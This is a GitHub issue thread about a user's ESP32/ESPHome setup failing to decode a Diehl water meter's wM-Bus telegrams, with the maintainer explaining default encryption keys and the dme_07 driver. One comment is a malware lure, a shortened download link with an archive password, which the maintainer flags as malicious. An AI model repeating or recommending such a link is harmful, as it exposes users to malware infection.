wmbusmeters/wmbusmeters #1352: telegram changes during decoding

cdupaty, 2024-08-27:
748 / 5,000
I am working with esphome on esp32 and CC1101. I receive the telegrams from my water meter but they are not decoded.
[18:26:08][VV][wmbus:061]: Have data from CC1101 ...
**[18:26:08][D][wmbus:182]: Meter ID [0x32406347] RSSI: -91 dBm LQI: 132 Frame: T1 A not found in configuration T: 1E44A511476340327B077AAD0010055CCE3F905CC65A7E80ED01FD27837F59 (31)**
[18:26:08][W][component:237]: Component wmbus took a long time for an operation (98 ms).
[18:26:08][W][component:238]: Components should block for at most 30 ms.

When decoding the telegram on wmbuster.org I noticed that the telegram is changed by the decoder.

[image]

I don't understand why.
Can you explain and help me finish my project.
Kind regards
Christian Dupaty

weetmuts, 2024-08-27:
Do you mean that wmbusmeters normalizes the Volume into cubic meters? That is by design.

c0ffincolors, 2024-08-27:
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

weetmuts, 2024-08-27:
Ah, yes the telegram is automatically decrypted since the meter uses a default well known key from this manufaturer.

weetmuts, 2024-08-27:
Your bit.ly link has been flagged as linking to malicious content. Please post a correct link.

weetmuts, 2024-08-27:
Hmm, it seems like a user coffincolors posted an hacker-attack on this issue, ie a link to a malicious site through bit.ly. But github or someone else, erased it quickly.... Did you copy the bit.ly link from that other post? Did you follow it?

cdupaty, 2024-08-28:
No i don't follow it. It does'nt work
But my problem is not solved, I don't know where to find the key used by wmbusmeters to decode my telegram

weetmuts, 2024-08-28:
You can find the key in this issue: https://github.com/wmbusmeters/wmbusmeters/issues/845

cdupaty, 2024-08-28:
Thank you! I tried the key ... Still the same error, the telegram is received but no decoding.
Do you know where I can find a key for DIEHL water meters installed in France?
Thank you for your help.
(Unless the problem comes from elsewhere)

cdupaty, 2024-08-28:
The telegram is decoded well by https://wmbusmeters.org/ but not by my esp32. 
Here is the (very simple) code I use in esphome: 

esphome:
  name: "watermeter-esp32"
  friendly_name: "watermeter-esp32"

esp32:
  board: esp32doit-devkit-v1
  framework:
    type: arduino

# Enable logging
logger:
  id: appslogger
  level: VERBOSE
  logs:
    wmbus: VERBOSE
    wMBus-lib: VERBOSE
    sensor: VERBOSE #WARN
    sensor.filter: VERBOSE #WARN
    mqtt: WARN
    api: VERBOSE #WARN
api:
  id: espapi_wmbus_esp32
  port: 6053
  reboot_timeout: 0s

wifi:
  ssid: !secret ssid1_name
  password: !secret ssid1_pswd

  # Optional manual IP
  manual_ip:
    static_ip: 192.168.1.11
    gateway: 192.168.1.254
    subnet: 255.255.255.0

ota:
  platform: esphome
  password: !secret ota_pswd

web_server:
  port: 80
  version: 2

time:
  - platform: sntp
    id: time_sntp

external_components:
  - source: github://SzczepanLeon/esphome-components@main
    components: [ wmbus ]

wmbus:
  mosi_pin: GPIO23    ## SI:   braun
  miso_pin: GPIO19    ## SO:   grün
  clk_pin: GPIO18     ## SCLK: violett
  cs_pin: GPIO05      ## CSN:  orange
  gdo0_pin: GPIO16    ## GD00: gelb (rx)
  gdo2_pin: GPIO17    ## GD02: weiss (tx)

  led_pin: GPIO2
  led_blink_time: "1s"

  #clients:
  #  - name: "wmbusmeters"
  #    ip_address: "192.168.1.215"
  #    port: 9022
  #    format: RTLWMBUS
  #    transport: TCP

sensor:
  - platform: wmbus
    #meter_id: ${wmid}
    meter_id: 0x01EE7B4B
    #meter_id: 0
    key: "51728910E66D83F851728910E66D83F8"
    #type: izar
    type: dme_07
    lqi:
      name: "My lqi"
    rssi:
      name: "My RSSI"
    total_water_m3:
      name: "My cold water"

weetmuts, 2024-08-28:
> Thank you! I tried the key ... Still the same error, the telegram is received but no decoding. 

The old brand Izar was created by the company Sappel which was bought by Diehl.
The protocol sent by the Sappel Izar meters is not wmbus-compliant, it needs its own
quite serious decoder, which is inside driver_izar.cc

But your Izar meter is modern (that you took a photo of here: https://github.com/zibous/ha-watermeter/issues/47) and is wmbus-compliant!

And dme_07 is the right driver, you can even see the dme 07 on the meter itself.
The dme 7b 07 combo is put into different branded meters, not just the Izar name but others.
That is why its not izar2 or something like that.

I cannot help you why the decoding fails within esp-home.

cdupaty, 2024-08-29:
Thank you very much for the explanations.
Since the decoding works on wmbusmeters.org, do you think it is possible for my esp32 to send the telegram to wmbusmeters and retrieve the json that is at the bottom of the page?

closed 2024-11-28 by github-actions[bot]